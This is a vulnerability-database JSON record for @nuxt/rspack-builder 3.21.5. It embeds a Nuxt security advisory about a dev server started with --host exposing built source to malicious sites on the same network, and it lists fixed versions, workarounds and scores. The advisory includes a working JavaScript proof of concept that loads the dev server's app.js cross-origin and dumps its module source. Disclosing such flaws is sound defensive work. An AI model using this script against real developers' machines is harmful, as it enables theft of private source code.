{"url":"http://public2.vulnerablecode.io/api/packages/515271?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@3.21.5","type":"npm","namespace":"@nuxt","name":"rspack-builder","version":"3.21.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.21.6","latest_non_vulnerable_version":"4.4.6","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91957?format=json","vulnerability_id":"VCID-vkvp-zzq7-fucv","summary":"Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)\n### Summary\nThis is an incomplete fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99). Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network.\n\n### Details\nThe fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because [these headers are sent by the browsers only for potentially trustworthy origins](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header:~:text=Site%20header%20for%20a%20request%20r%3A-,Assert%3A%20r%E2%80%99s%20url%20is%20a%20potentially%20trustworthy%20URL.,-Let%20header%20be%20a%20Structured%20Field%20whose), the check is able to bypass for non-potentially trustworthy origins.\n\nSince the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using `--host` is affected.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement('script')\nscript.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to\nscript.addEventListener('load', () => {\n  const key = Object.keys(window).find(k => k.startsWith(\"webpackChunk\"))\n  for (const page in window[key]) {\n    const moduleList = window[key][page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement('p')\n      const title = document.createElement('strong')\n      title.textContent = key\n      const code = document.createElement('code')\n      code.textContent = moduleList[key].toString()\n      p.append(title, ':', document.createElement('br'), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n(This script is the similar with [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) except for the `script.src` and the global variable name)\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using `--host`.\n\nThis vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to [the local network access restriction feature](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### Patches\nFixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35051](https://github.com/nuxt/nuxt/pull/35051). The dev-middleware same-origin check now falls back to comparing the request's `Origin` / `Referer` host against `Host` when `Sec-Fetch-*` headers are absent, closing the non-trustworthy-origin bypass.\n\nThe fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected.\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n- Don't use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.\n- Use Chrome 142+ or another Chromium-based browser that enforces [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n- Switch to the Vite builder for development.","references":[{"reference_url":"https://github.com/nuxt/nuxt","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt"},{"reference_url":"https://github.com/nuxt/nuxt/pull/35051","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt/pull/35051"},{"reference_url":"https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"},{"reference_url":"https://github.com/advisories/GHSA-6m52-m754-pw2g","reference_id":"GHSA-6m52-m754-pw2g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6m52-m754-pw2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114470?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@3.21.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@3.21.6"},{"url":"http://public2.vulnerablecode.io/api/packages/114471?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@4.4.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@4.4.6"}],"aliases":["CVE-2026-45670","GHSA-6m52-m754-pw2g"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vkvp-zzq7-fucv"}],"fixing_vulnerabilities":[],"risk_score":"3.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@3.21.5"}